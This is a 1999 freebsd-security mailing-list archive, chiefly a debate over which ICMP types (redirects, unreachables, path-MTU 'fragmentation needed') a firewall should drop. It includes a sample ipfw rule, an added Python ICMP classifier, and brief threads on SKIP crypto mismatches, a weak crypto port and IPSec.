From owner-freebsd-security Sun Jan 17 01:43:24 1999
From: "N. N.M"
To: freebsd-security@FreeBSD.ORG
Subject: Small Servers - ICMP Redirect
Date: Sun, 17 Jan 1999 01:43:20 PST
Message-ID: <19990117094320.20052.qmail@hotmail.com>

Hi,

I have two security-related questions:

1) Might there be any problem in connectivity and services if I block all
traffic to the (TCP/UDP) small servers like echo, chargen, .... on the firewall?

2) About ICMP redirect messages, as I learned they could be used to make
our network disconnected and something. What's the way to prevent this
kind of attack? Does blocking this kind of ICMP on firewalls and routers
cause any problem in connectivity and system behavior?

Thanks in advance,
Nazila N.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Jan 17 11:59:34 1999
From: Snob Art Genre
Reply-To: ben@rosengart.com
To: "N. N.M"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Small Servers - ICMP Redirect
Date: Sun, 17 Jan 1999 14:59:26 -0500 (EST)
In-Reply-To: <19990117094320.20052.qmail@hotmail.com>

On Sun, 17 Jan 1999, N. N.M wrote:

> 1) Might there be any problem in connectivity and services if I block all
> traffic to the (TCP/UDP) small servers like echo, chargen, .... on the firewall?

Not a problem, go ahead.

> 2) About ICMP redirect messages, as I learned they could be used to make
> our network disconnected and something. What's the way to prevent this
> kind of attack? Does blocking this kind of ICMP on firewalls and routers
> cause any problem in connectivity and system behavior?

I would block these messages from entering my network, absolutely.

Ben

"You have your mind on computers, it seems."
From owner-freebsd-security Sun Jan 17 12:29:05 1999
From: "Justin Wolf"
To: , "N. N.M"
Subject: Re: Small Servers - ICMP Redirect
Date: Sun, 17 Jan 1999 12:20:45 -0800
Message-ID: <007701be4256$f01ff740$02c3fe90@cisco.com>

>> 2) About ICMP redirect messages, as I learned they could be used to make
>> our network disconnected and something. What's the way to prevent this
>> kind of attack? Does blocking this kind of ICMP on firewalls and routers
>> cause any problem in connectivity and system behavior?
>
>I would block these messages from entering my network, absolutely.

Keep in mind that flatly blocking all ICMP messages will prevent traces and
pings both in and out of your network. It will also affect certain
services... The best way to tailor this is to block everything and loosen
it up as necessary to keep things from breaking.

-Justin

From owner-freebsd-security Sun Jan 17 13:55:25 1999
From: "Daniel O'Callaghan"
To: Justin Wolf
Cc: ben@rosengart.com, "N. N.M", freebsd-security@FreeBSD.ORG
Subject: Re: Small Servers - ICMP Redirect
Date: Mon, 18 Jan 1999 08:54:45 +1100 (EST)
In-Reply-To: <007701be4256$f01ff740$02c3fe90@cisco.com>

On Sun, 17 Jan 1999, Justin Wolf wrote:

> >> 2) About ICMP redirect messages, as I learned they could be used to make
> >> our network disconnected and something. What's the way to prevent this
> >> kind of attack? Does blocking this kind of ICMP on firewalls and routers
> >> cause any problem in connectivity and system behavior?
> >
> >I would block these messages from entering my network, absolutely.
>
> Keep in mind that flatly blocking all ICMP messages will prevent traces and
> pings both in and out of your network. It will also affect certain
> services... The best way to tailor this is to block everything and loosen
> it up as necessary to keep things from breaking.

It will also block useful things like source-quench. ICMP exists for a
reason.

Danny

From owner-freebsd-security Sun Jan 17 13:56:42 1999
From: Snob Art Genre
Reply-To: ben@rosengart.com
To: "Daniel O'Callaghan"
Cc: Justin Wolf, "N. N.M", freebsd-security@FreeBSD.ORG
Subject: Re: Small Servers - ICMP Redirect
Date: Sun, 17 Jan 1999 16:56:19 -0500 (EST)

On Mon, 18 Jan 1999, Daniel O'Callaghan wrote:

> On Sun, 17 Jan 1999, Justin Wolf wrote:
>
> > >> 2) About ICMP redirect messages, as I learned they could be used to make
> > >> our network disconnected and something. What's the way to prevent this
> > >> kind of attack? Does blocking this kind of ICMP on firewalls and routers
> > >> cause any problem in connectivity and system behavior?
> > >
> > >I would block these messages from entering my network, absolutely.
> >
> > Keep in mind that flatly blocking all ICMP messages will prevent traces and
> > pings both in and out of your network. It will also affect certain
> > services... The best way to tailor this is to block everything and loosen
> > it up as necessary to keep things from breaking.
>
> It will also block useful things like source-quench. ICMP exists for a
> reason.

Read the question again, people.

Ben

"You have your mind on computers, it seems."
From owner-freebsd-security Sun Jan 17 14:13:31 1999
From: "Justin Wolf"
To: , "Daniel O'Callaghan"
Cc: "N. N.M",
Subject: Re: Small Servers - ICMP Redirect
Date: Sun, 17 Jan 1999 14:05:12 -0800
Message-ID: <001101be4265$88868540$02c3fe90@cisco.com>

>> > >> 2) About ICMP redirect messages, as I learned they could be used to make
>> > >> our network disconnected and something. What's the way to prevent this
>> > >> kind of attack? Does blocking this kind of ICMP on firewalls and routers
>> > >> cause any problem in connectivity and system behavior?
>> > >
>> > >I would block these messages from entering my network, absolutely.
>> >
>> > Keep in mind that flatly blocking all ICMP messages will prevent traces and
>> > pings both in and out of your network. It will also affect certain
>> > services... The best way to tailor this is to block everything and loosen
>> > it up as necessary to keep things from breaking.
>>
>> It will also block useful things like source-quench. ICMP exists for a
>> reason.
>
>Read the question again, people.

I believe I had read the question and that my response was applicable.
Perhaps you should read the responses again? Blocking ICMP redirects is
definitely advisable - I was suggesting that ICMP messages not be blocked on
the whole. I apologize if my wording, or the wording of Daniel, is
misleading...

-Justin

From owner-freebsd-security Sun Jan 17 14:35:33 1999
From: Snob Art Genre
Reply-To: ben@rosengart.com
To: Justin Wolf
Cc: "Daniel O'Callaghan", freebsd-security@FreeBSD.ORG, "N. N.M"
Subject: Re: Small Servers - ICMP Redirect
Date: Sun, 17 Jan 1999 17:35:16 -0500 (EST)
In-Reply-To: <001101be4265$88868540$02c3fe90@cisco.com>

On Sun, 17 Jan 1999, Justin Wolf wrote:

> I believe I had read the question and that my response was applicable.
> Perhaps you should read the responses again? Blocking ICMP redirects is
> definitely advisable - I was suggesting that ICMP messages not be blocked on
> the whole. I apologize if my wording, or the wording of Daniel, is
> misleading...

The question only concerned redirects. You're correct that blocking all
ICMP is harmful, but I don't believe the original poster was considering
that policy.

On further reflection, I have one thing to add: it seems to me that
redirects sent to the firewall router itself may or may not be trusted,
depending whom you're talking to, but keeping them from entering your
network is a good idea.

Ben

"You have your mind on computers, it seems."

From owner-freebsd-security Sun Jan 17 14:42:29 1999
From: Archie Cobbs
To: jjwolf@bleeding.com (Justin Wolf)
Cc: ben@rosengart.com, madrapour@hotmail.com, freebsd-security@FreeBSD.ORG
Subject: Re: Small Servers - ICMP Redirect
Date: Sun, 17 Jan 1999 14:41:02 -0800 (PST)
Message-Id: <199901172241.OAA21852@bubba.whistle.com>
In-Reply-To: <007701be4256$f01ff740$02c3fe90@cisco.com> from Justin Wolf at "Jan 17, 99 12:20:45 pm"

Justin Wolf writes:

> >> 2) About ICMP redirect messages, as I learned they could be used to make
> >> our network disconnected and something. What's the way to prevent this
> >> kind of attack? Does blocking this kind of ICMP on firewalls and routers
> >> cause any problem in connectivity and system behavior?
> >
> >I would block these messages from entering my network, absolutely.
>
> Keep in mind that flatly blocking all ICMP messages will prevent traces and
> pings both in and out of your network. It will also affect certain
> services... The best way to tailor this is to block everything and loosen
> it up as necessary to keep things from breaking.

This is the ICMP rule we generally use:

    ipfw add 10 allow icmp from any to any in icmptypes 0,3,4,11,12,14,16,18

This allows "safe" ICMPs to get in, so that ping, traceroute, etc. work,
while blocking potentially unsafe ICMPs. See /sys/netinet/ip_icmp.h for
definitions of the ICMP types.

-Archie

___________________________________________________________________________
Archie Cobbs * Whistle Communications, Inc.
* http://www.whistle.com

From owner-freebsd-security Sun Jan 17 15:14:00 1999
From: Garrett Wollman
To: "Daniel O'Callaghan"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Small Servers - ICMP Redirect
Date: Sun, 17 Jan 1999 18:09:14 -0500 (EST)
Message-Id: <199901172309.SAA09685@khavrinen.lcs.mit.edu>
References: <007701be4256$f01ff740$02c3fe90@cisco.com>

< said:

> It will also block useful things like source-quench. ICMP exists for a
> reason.

Actually, it will block useful things like `destination unreachable'
and `fragmentation required'. Source Quench is not useful -- just ask
any router vendor.

As a general rule, you should accept all UNREACHABLE, TIME EXCEEDED,
and PARAMETER PROBLEM messages, might or might not accept ECHO
REQUEST and ECHO RESPONSE, and should drop all others.

-GAWollman

--
Garrett A. Wollman    | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu   | O Siem / The fires of freedom
Opinions not those of | Dance in the burning flame
MIT, LCS, CRS, or NSA | - Susan Aglukark and Chad Irschick

From owner-freebsd-security Sun Jan 17 15:51:30 1999
From: Christian Kuhtz
To: "Daniel O'Callaghan"
Cc: Justin Wolf, ben@rosengart.com, "N. N.M", freebsd-security@FreeBSD.ORG
Subject: Re: Small Servers - ICMP Redirect
Date: Sun, 17 Jan 1999 18:50:47 -0500
Message-ID: <19990117185047.A97318@oreo.adsu.bellsouth.com>
References: <007701be4256$f01ff740$02c3fe90@cisco.com>
In-Reply-To: ; from Daniel O'Callaghan on Mon, Jan 18, 1999 at 08:54:45AM +1100

On Mon, Jan 18, 1999 at 08:54:45AM +1100, Daniel O'Callaghan wrote:

> On Sun, 17 Jan 1999, Justin Wolf wrote:
> > Keep in mind that flatly blocking all ICMP messages will prevent traces and
> > pings both in and out of your network. It will also affect certain
> > services... The best way to tailor this is to block everything and loosen
> > it up as necessary to keep things from breaking.
>
> It will also block useful things like source-quench. ICMP exists for a
> reason.

With all due respect, ICMP source quenches are in my experience not a regular
occurrence (even though it'd be nice to get them more frequently) and even if
they occur, most stacks don't know how to deal with it correctly.

ICMP is primarily a diagnostic tool. In a properly configured network, ICMP
is not necessary. Again, loosen your configs as needed. A lack of ICMP
in a properly configured network is irritating at best, but not life
threatening.

Cheers,
Chris

--
"We are not bound by any concept, we are just bound to make any concept
work better than others." -- Dr. Ferry Porsche

[Disclaimer: I speak for myself and my views are my own and not in any way to
be construed as the views of BellSouth Corporation. ]

From owner-freebsd-security Sun Jan 17 15:56:03 1999
From: Christian Kuhtz
To: Garrett Wollman
Cc: "Daniel O'Callaghan", freebsd-security@FreeBSD.ORG
Subject: Re: Small Servers - ICMP Redirect
Date: Sun, 17 Jan 1999 18:55:43 -0500
Message-ID: <19990117185543.C97318@oreo.adsu.bellsouth.com>
References: <007701be4256$f01ff740$02c3fe90@cisco.com> <199901172309.SAA09685@khavrinen.lcs.mit.edu>
In-Reply-To: <199901172309.SAA09685@khavrinen.lcs.mit.edu>; from Garrett Wollman on Sun, Jan 17, 1999 at 06:09:14PM -0500

On Sun, Jan 17, 1999 at 06:09:14PM -0500, Garrett Wollman wrote:

> Actually, it will block useful things like `destination unreachable'
> and `fragmentation required'. Source Quench is not useful -- just ask
> any router vendor.

Yep. Like the frame-relay FECN/BECN.

> As a general rule, you should accept all UNREACHABLE, TIME EXCEEDED,
> and PARAMETER PROBLEM messages, might or might not accept ECHO
> REQUEST and ECHO RESPONSE, and should drop all others.

It should be pointed out, though, that nothing gets broken when those are
blocked. The rest is religion and should be discussed on
firewalls@greatcircle.com

Thanks,
Chris

--
"We are not bound by any concept, we are just bound to make any concept
work better than others." -- Dr. Ferry Porsche

[Disclaimer: I speak for myself and my views are my own and not in any way to
be construed as the views of BellSouth Corporation. ]

From owner-freebsd-security Sun Jan 17 16:27:47 1999
From: Snob Art Genre
Reply-To: ben@rosengart.com
To: Christian Kuhtz
Cc: "Daniel O'Callaghan", Justin Wolf, ben@rosengart.com, "N. N.M", freebsd-security@FreeBSD.ORG
Subject: Re: Small Servers - ICMP Redirect
Date: Sun, 17 Jan 1999 19:27:30 -0500 (EST)
In-Reply-To: <19990117185047.A97318@oreo.adsu.bellsouth.com>

On Sun, 17 Jan 1999, Christian Kuhtz wrote:

> With all due respect, ICMP source quenches are in my experience not a regular
> occurrence (even though it'd be nice to get them more frequently) and even if
> they occur, most stacks don't know how to deal with it correctly.
>
> ICMP is primarily a diagnostic tool. In a properly configured network, ICMP
> is not necessary. Again, loosen your configs as needed. A lack of ICMP
> in a properly configured network is irritating at best, but not life
> threatening.

I disagree. ICMP is *required* for Solaris' path MTU discovery, for host
unreachable messages, and for UDP port unreachables. There are probably
several other applications that break without ICMP. ICMP is not
optional, it's part of the Internet Protocol.

I agree about source quenches though.

Ben

"You have your mind on computers, it seems."
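The two filtering policies argued over in this thread (Wollman's general rule and Archie Cobbs's ipfw icmptypes list), together with the type 3 / code 4 "fragmentation needed" message that path MTU discovery depends on, written out as a small ingress classifier. This is an added example and not code from any of the posters; the function names, the checksum helper and the constructed sample packets are mine, and the type and code numbers are the RFC 792 / RFC 1191 values, named after the macros in /sys/netinet/ip_icmp.h.

```python
"""ICMP ingress classifier for the policies discussed in this thread (added example)."""
import struct
from typing import Dict, Tuple

# ICMP type numbers (RFC 792), named after /sys/netinet/ip_icmp.h.
ICMP_ECHOREPLY = 0
ICMP_UNREACH = 3
ICMP_SOURCEQUENCH = 4
ICMP_REDIRECT = 5
ICMP_ECHO = 8
ICMP_TIMXCEED = 11
ICMP_PARAMPROB = 12
ICMP_UNREACH_NEEDFRAG = 4   # code under type 3; path MTU discovery (RFC 1191) relies on it

# Wollman's general rule: always accept UNREACH, TIME EXCEEDED and PARAMETER PROBLEM,
# make ECHO/ECHO REPLY a site choice, drop everything else (redirect, source quench, ...).
WOLLMAN_ALWAYS = frozenset({ICMP_UNREACH, ICMP_TIMXCEED, ICMP_PARAMPROB})
WOLLMAN_OPTIONAL = frozenset({ICMP_ECHO, ICMP_ECHOREPLY})

# Archie's ipfw rule: "allow icmp from any to any in icmptypes 0,3,4,11,12,14,16,18".
ARCHIE_IPFW_TYPES = frozenset({0, 3, 4, 11, 12, 14, 16, 18})


def icmp_checksum(msg: bytes) -> int:
    """RFC 1071 one's-complement sum over the whole message; 0 means the stored checksum is valid."""
    if len(msg) % 2:
        msg += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(msg) // 2), msg))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_icmp_header(msg: bytes) -> Tuple[int, int, int]:
    """Return (type, code, checksum) from an ICMP message; reject anything shorter than 8 bytes."""
    if len(msg) < 8:
        raise ValueError("ICMP header needs 8 bytes, got %d" % len(msg))
    return struct.unpack("!BBH", msg[:4])


def build_icmp(icmp_type: int, code: int, rest: bytes = b"\x00" * 4,
               payload: bytes = b"") -> bytes:
    """Construct a sample ICMP message with a correct checksum (constructed test data)."""
    body = rest + payload
    csum = icmp_checksum(struct.pack("!BBH", icmp_type, code, 0) + body)
    return struct.pack("!BBH", icmp_type, code, csum) + body


def wollman_verdict(msg: bytes, allow_echo: bool = False) -> str:
    """'allow' or 'drop' under Wollman's rule; truncated or bad-checksum packets drop."""
    try:
        icmp_type, _code, _csum = parse_icmp_header(msg)
    except ValueError:
        return "drop"
    if icmp_checksum(msg) != 0:
        return "drop"
    if icmp_type in WOLLMAN_ALWAYS:
        return "allow"
    if allow_echo and icmp_type in WOLLMAN_OPTIONAL:
        return "allow"
    return "drop"


def archie_verdict(msg: bytes) -> str:
    """'allow' or 'drop' under the ipfw icmptypes list (matches on type only, as ipfw does)."""
    try:
        icmp_type, _code, _csum = parse_icmp_header(msg)
    except ValueError:
        return "drop"
    return "allow" if icmp_type in ARCHIE_IPFW_TYPES else "drop"


def is_pmtud_needfrag(msg: bytes) -> bool:
    """True for type 3 / code 4, the message that path MTU discovery cannot work without."""
    icmp_type, code, _csum = parse_icmp_header(msg)
    return icmp_type == ICMP_UNREACH and code == ICMP_UNREACH_NEEDFRAG


def classify_samples() -> Dict[str, Tuple[str, str]]:
    """Run constructed packets through both policies: name -> (wollman, archie)."""
    samples = {
        "redirect":      build_icmp(ICMP_REDIRECT, 1),                       # code 1: redirect for host
        "frag-needed":   build_icmp(ICMP_UNREACH, ICMP_UNREACH_NEEDFRAG,
                                    b"\x00\x00\x05\xdc"),                    # next-hop MTU 1500
        "port-unreach":  build_icmp(ICMP_UNREACH, 3),                        # what traceroute relies on
        "time-exceeded": build_icmp(ICMP_TIMXCEED, 0),
        "source-quench": build_icmp(ICMP_SOURCEQUENCH, 0),
        "echo-request":  build_icmp(ICMP_ECHO, 0, b"\x12\x34\x00\x01"),     # id 0x1234, seq 1
    }
    return {name: (wollman_verdict(pkt), archie_verdict(pkt)) for name, pkt in samples.items()}


if __name__ == "__main__":
    for name, (w, a) in classify_samples().items():
        print("%-14s wollman=%-5s archie=%s" % (name, w, a))
```

The two policies differ only on source quench (type 4), which Archie's list admits and Wollman's rule drops; both drop redirects, and both let the 3/4 message through.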
From owner-freebsd-security Sun Jan 17 16:31:09 1999
From: Matthew Dillon
To: Christian Kuhtz
Cc: "Daniel O'Callaghan", Justin Wolf, ben@rosengart.com, "N. N.M", freebsd-security@FreeBSD.ORG
Subject: Re: Small Servers - ICMP Redirect
Date: Sun, 17 Jan 1999 16:30:56 -0800 (PST)
Message-Id: <199901180030.QAA54407@apollo.backplane.com>
References: <007701be4256$f01ff740$02c3fe90@cisco.com> <19990117185047.A97318@oreo.adsu.bellsouth.com>

:With all due respect, ICMP source quenches are in my experience not a regular
:occurrence (even though it'd be nice to get them more frequently) and even if
:they occur, most stacks don't know how to deal with it correctly.
:
:ICMP is primarily a diagnostic tool. In a properly configured network, ICMP
:is not necessary. Again, loosen your configs as needed. A lack of ICMP
:in a properly configured network is irritating at best, but not life
:threatening.
:
:Cheers,
:Chris

    ICMP is definitely not just a diagnostic tool, and it is put to good use
    in a properly configured network. For example, Path MTU Discovery
    uses ICMP ( RFC 1191 ). ICMP is not something you want to arbitrarily
    filter. At the very least you want to let through the various
    unreachability messages.

    -Matt
    Matthew Dillon

From owner-freebsd-security Sun Jan 17 16:47:45 1999
From: Christian Kuhtz
To: Matthew Dillon
Cc: Christian Kuhtz, "Daniel O'Callaghan", Justin Wolf, ben@rosengart.com, "N. N.M", freebsd-security@FreeBSD.ORG
Subject: Re: Small Servers - ICMP Redirect
Date: Sun, 17 Jan 1999 19:47:06 -0500
Message-ID: <19990117194706.H97318@oreo.adsu.bellsouth.com>
References: <007701be4256$f01ff740$02c3fe90@cisco.com> <19990117185047.A97318@oreo.adsu.bellsouth.com> <199901180030.QAA54407@apollo.backplane.com>
In-Reply-To: <199901180030.QAA54407@apollo.backplane.com>; from Matthew Dillon on Sun, Jan 17, 1999 at 04:30:56PM -0800

On Sun, Jan 17, 1999 at 04:30:56PM -0800, Matthew Dillon wrote:

> ICMP is definitely not just a diagnostic tool, and it is put to good use
> in a properly configured network. For example, Path MTU Discovery
> uses ICMP ( RFC 1191 ). ICMP is not something you want to arbitrarily
> filter. At the very least you want to let through the various
> unreachability messages.

#ifndef _RUNAWAY_-CURRENT_THREAD

Nothing is broken by not getting host unreachable messages.

Nothing breaks by not permitting traceroutes (port unreachable et al).

Sure, path MTU discovery according to RFC1191 is nice, but not vital.
Arguably, there are other much bigger bottlenecks over WANs (at the edge
of which firewalls are typically used) than suboptimal MRUs.

Many service providers filter and/or rate limit ICMP messages (to prevent
SMURF amplification et al from causing havoc to their infrastructures).

To build applications which _rely exclusively_ on ICMP to work is close to
grossly negligent. Those that do are primarily diagnostic applications.

I didn't say ICMP is an optional component of IP. This was in the context
of firewalls. Some schools of firewall design insist that only absolutely
required traffic pass the firewall. As such, turning ICMP off at the
firewall is perhaps not the prettiest or whatever way to do it, but it
certainly prevents the various exploits based on ICMP.

#endif /* _RUNAWAY_-CURRENT_THREAD */

There is no such thing as a free lunch. Security doesn't come without a
price. In fact, I am required to trade slight performance and convenience
for security. And so are many others. That is where the question and my
response originated. If you aren't part of that group... use IP to the
fullest and ignore this thread.

Cheers,
Chris

--
"We are not bound by any concept, we are just bound to make any concept
work better than others." -- Dr. Ferry Porsche

[Disclaimer: I speak for myself and my views are my own and not in any way to
be construed as the views of BellSouth Corporation.
]

From owner-freebsd-security Sun Jan 17 16:50:13 1999
From: David G Andersen
To: ck@adsu.bellsouth.com (Christian Kuhtz)
Cc: danny@hilink.com.au, jjwolf@bleeding.com, ben@rosengart.com, madrapour@hotmail.com, freebsd-security@FreeBSD.ORG
Subject: Re: Small Servers - ICMP Redirect
Date: Sun, 17 Jan 1999 17:51:06 -0700 (MST)
Message-Id: <199901180051.RAA16892@lal.cs.utah.edu>
In-Reply-To: <19990117185047.A97318@oreo.adsu.bellsouth.com> from "Christian Kuhtz" at Jan 17, 99 06:50:47 pm

Lo and behold, Christian Kuhtz once said:

>
> ICMP is primarily a diagnostic tool. In a properly configured network, ICMP
> is not necessary. Again, loosen your configs as needed. A lack of ICMP
> in a properly configured network is irritating at best, but not life
> threatening.

This is actually incorrect. ICMP is an important part of path MTU
discovery (did I say important? I meant critical). You really don't
want to block ICMP_UNREACH_NEEDFRAG messages, because it *will* hurt
your performance. That's ICMP type 3, subtype 4, for those of you
counting.

-Dave

From owner-freebsd-security Sun Jan 17 17:03:34 1999
From: David Kulp
To: freebsd-security@FreeBSD.ORG
Subject: SKIP algorithm mismatch: FBSD vs Solaris
Date: Sun, 17 Jan 1999 17:03:21 -0800 (PST)
Message-Id: <199901180103.RAA19385@board66.cruzers.com>

I've got a FBSD<-internet->Solaris setup and I'd like to run IP-level
encryption between them. I installed skip-1.0 from the FBSD port
collection and did a pkgadd of the Solaris skip-1.1 from
http://skip.incog.com/.

Unfortunately, it seems they don't share any crypto algorithms. Am I
out of luck? If so, what non-skip alternatives might I have?

thanks!
-david.
On FreeBSD (Skip 1.0):
# skipstat -C

Cryptographic algorithms (SKIP version 1):
Crypto Module Id: 1    Crypto Name: DES-CBC
Crypto Module Id: 10   Crypto Name: simplecrypt

Cryptographic algorithms (SKIP):
Crypto Module Id: 1    Crypto Name: DES-CBC
Crypto Module Id: 2    Crypto Name: DES-EDE-K3
Crypto Module Id: 241  Crypto Name: Safer-128SK-CBC
Crypto Module Id: 252  Crypto Name: simplecrypt

MAC algorithms (SKIP):
MAC Module Id: 1       MAC Name: MD5

On Solaris (Skip 1.1):
# skipstat -C

Cryptographic algorithms (SKIP version 1):
Crypto Module Id: 2    Crypto Name: RC2-40
Crypto Module Id: 3    Crypto Name: RC4-40

Cryptographic algorithms (SKIP):
Crypto Module Id: 240  Crypto Name: RC4-40
Crypto Module Id: 242  Crypto Name: RC2-40

MAC algorithms (SKIP):
MAC Module Id: 1       MAC Name: MD5

From owner-freebsd-security Sun Jan 17 18:00:00 1999
From: Archie Cobbs
Message-Id: <199901180158.RAA03089@bubba.whistle.com>
Subject: Re: SKIP algorithm mismatch: FBSD vs Solaris
In-Reply-To: <199901180103.RAA19385@board66.cruzers.com> from David Kulp at "Jan 17, 99 05:03:21 pm"
To: dkulp@neomorphic.com (David Kulp)
Date: Sun, 17 Jan 1999
 17:58:52 -0800 (PST)
Cc: freebsd-security@FreeBSD.ORG

David Kulp writes:
> I've got a FBSD<-internet->Solaris setup and I'd like to run IP-level
> encryption between them. I installed skip-1.0 from the FBSD port
> collection and did a pkgadd of the Solaris skip-1.1 from
> http://skip.incog.com/.
>
> Unfortunately, it seems they don't share any crypto algorithms. Am I
> out of luck? If so, what non-skip alternatives might I have?

A very interesting anti-coincidence. You should try bitching at Sun.
If they are completely inflexible then we know they did it on purpose :-)

-Archie

___________________________________________________________________________
Archie Cobbs   *   Whistle Communications, Inc.  *   http://www.whistle.com

From owner-freebsd-security Sun Jan 17 21:13:20 1999
From: jbg@masterplan.org (Jason George)
To: freebsd-security@FreeBSD.ORG
Subject: Re: SKIP algorithm mismatch: FBSD vs Solaris
Message-Id: <199901180513.WAA23546@gongshow.masterplan.org>
Organization: The Master Plan Always Fails...
Date: Mon, 18 Jan 1999 05:14:21 GMT

The Solaris package version is the global version (512-bit) of the SKIP
binary, whereas the FreeBSD port is the U.S./Canada version (2048-bit).

I ordered the Windows version online a few months ago and downloaded via
the Sun website. It only supported the RC2/RC4 algorithms. It took me a
full week of persistent bugging to get Sun to tell me that the only way to
obtain the 2048-bit version was to have them ship me a copy to a verified
North American address.

The bottom line is that all of the web-downloadable SKIP binaries are only
compiled to run at "global" level encryption strength. I'm quite confident
that the $$$ version of Solaris SKIP will support stronger encryption. I'm
also confident that if you compiled the Solaris version from scratch, it
would support stronger encryption.

Hope this helps.

--Jason
j.b.georgeieee.org
jbgmasterplan.org

>I've got a FBSD<-internet->Solaris setup and I'd like to run IP-level
>encryption between them. I installed skip-1.0 from the FBSD port
>collection and did a pkgadd of the Solaris skip-1.1 from
>http://skip.incog.com/.
>
>Unfortunately, it seems they don't share any crypto algorithms. Am I
>out of luck? If so, what non-skip alternatives might I have?
>
>thanks!
>-david.
>
>On FreeBSD (Skip 1.0):
># skipstat -C
>
>Cryptographic algorithms (SKIP version 1):
>Crypto Module Id: 1    Crypto Name: DES-CBC
>Crypto Module Id: 10   Crypto Name: simplecrypt
>
>Cryptographic algorithms (SKIP):
>Crypto Module Id: 1    Crypto Name: DES-CBC
>Crypto Module Id: 2    Crypto Name: DES-EDE-K3
>Crypto Module Id: 241  Crypto Name: Safer-128SK-CBC
>Crypto Module Id: 252  Crypto Name: simplecrypt
>
>MAC algorithms (SKIP):
>MAC Module Id: 1       MAC Name: MD5
>
>On Solaris (Skip 1.1):
># skipstat -C
>
>Cryptographic algorithms (SKIP version 1):
>Crypto Module Id: 2    Crypto Name: RC2-40
>Crypto Module Id: 3    Crypto Name: RC4-40
>
>Cryptographic algorithms (SKIP):
>Crypto Module Id: 240  Crypto Name: RC4-40
>Crypto Module Id: 242  Crypto Name: RC2-40
>
>MAC algorithms (SKIP):
>MAC Module Id: 1       MAC Name: MD5

From owner-freebsd-security Mon Jan 18 01:09:39 1999
From: Darren Reed
Date: Mon, 18 Jan 1999 20:08:33 +1100 (EDT)
To: ck@adsu.bellsouth.com (Christian Kuhtz)
Subject: Re: Small Servers - ICMP Redirect
Message-Id: <199901180908.UAA02014@cheops.anu.edu.au>
Cc: dillon@apollo.backplane.com, ck@adsu.bellsouth.com, danny@hilink.com.au, jjwolf@bleeding.com, ben@rosengart.com, madrapour@hotmail.com,
 freebsd-security@FreeBSD.ORG
In-Reply-To: <19990117194706.H97318@oreo.adsu.bellsouth.com> from "Christian Kuhtz" at Jan 17, 99 07:47:06 pm

In some mail from Christian Kuhtz, sie said:
[...]
> Nothing is broken by not getting host unreachable messages. Nothing breaks
> by not permitting traceroutes (port unreachable et al). Sure, path MTU
> discovery according to RFC1191 is nice, but not vital. Arguably, there are
> other much bigger bottlenecks over WANs (at the edge of which firewalls are
> typically used) than suboptimal MRUs.
[...]

Depends on how you define "broken". If you don't mind waiting two minutes
for a TCP connection to report "connection timed out" when it could return
"network/host unreachable" then sure, stopping ICMP unreachables doesn't
break anything. There's also a similar impact on DNS things which operate
over the WAN (squid's protocol, DNS, NTP, etc) which can return an error
that isn't "connection timed out".
Darren

From owner-freebsd-security Mon Jan 18 07:11:29 1999
From: Nate Williams
Date: Mon, 18 Jan 1999 08:11:06 -0700
To: Christian Kuhtz
Cc: Matthew Dillon, "Daniel O'Callaghan", freebsd-security@FreeBSD.ORG
Subject: Re: Small Servers - ICMP Redirect
Message-Id: <199901181511.IAA26164@mt.sri.com>
In-Reply-To: <19990117194706.H97318@oreo.adsu.bellsouth.com>

>> ICMP is definitely not just a diagnostic tool, and it is put to
>> good use in a properly configured network. For example, Path MTU
>> Discovery uses ICMP ( RFC 1191 ). ICMP is not something you want
>> to arbitrarily filter. At the very least you want to let through
>> the various unreachability messages.
>
> Nothing is broken by not getting host unreachable messages.
> Nothing breaks by not permitting traceroutes (port unreachable et al). Sure,
> path MTU discovery according to RFC1191 is nice, but not vital.

Hmm, you really don't have a clue, do you?

If you break path MTU discovery in your LAN, then you won't get any data
to it. Assuming you want to be on the internet, then getting packets is
kind of vital.

See a recent set of postings I started around the middle of December last
year on hackers on why path MTU discovery working is important.

Nate

From owner-freebsd-security Mon Jan 18 07:19:33 1999
From: Christopher Nielsen
Reply-To: Christopher Nielsen
Date: Mon, 18 Jan 1999 07:18:59 -0800 (PST)
To: freebsd-security@FreeBSD.ORG
Subject: Port of 'bugs' in ports tree

Poking around in the ports tree this morning, I noticed a port under
ports/security called bugs. It caught my attention because pkg/DESCR says
it's a crypto library. Having never heard of it, I decided to take a look
at it.
After perusing the code and reading through the description of the
algorithm, I feel very strongly that a warning of some kind should be
placed on this piece of software. This is NOT secure in any sense of the
word (except possibly against little sisters/brothers). I can think of at
least one cryptanalysis attack off the top of my head (poor source of
random data), and that's after spending 10 minutes looking at the code and
reading the algorithm.

Comments?

--
Christopher Nielsen
Scient: The eBusiness Systems Innovator
cnielsen@scient.com

From owner-freebsd-security Mon Jan 18 10:30:44 1999
From: William McVey
Date: Mon, 18 Jan 1999 12:30:20 -0600
To: "Alexander Avanesov"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Need help with IPSec
Message-Id: <199901181830.MAA13084@s07.sa.fedex.com>

Sorry for the late reply on this.
I looked and didn't see an answer to this question come by, so I thought
it might still be relevant.

"Alexander Avanesov" wrote:
>Maybe dummy question, but I want to find a solution.
>I have two FreeBSD-2.2.6R connected via RadioEthernet.
>So, I want to establish a virtual channel.
>My network looks like this:
>So, I try to implement a virtual channel between them.
>I got a ipsec distribution from www.r4k.net and built it.
>A question is: how to setup ipsecadm and rt to get a tunnel?

I have no experience with the ipsec implementation on r4k.net; however,
the "official" IPSec port appears to be at www.kame.net (it's the one
linked to from the project list page at the FreeBSD website). Its
IPSec/IPv6 stack is apparently being integrated into the base OS. I've
got it up and running on one of my test systems and it appears promising
(a little rough around the edges, but core functionality appears to be
there).

-- William

From owner-freebsd-security Mon Jan 18 16:07:09 1999
Message-Id: <4.1.19990119010408.02c0d7d0@195.250.206.101>
Date: Tue, 19 Jan 1999 01:06:32 +0100
To: freebsd-security@FreeBSD.ORG
From: Tomaz Borstnar
Subject: ipfw filters for icmp which don't break things - Was: Re: Small Servers - ICMP Redirect
In-Reply-To: <199901181511.IAA26164@mt.sri.com>

Would some kind soul provide ipfw filters for icmp with some comments so
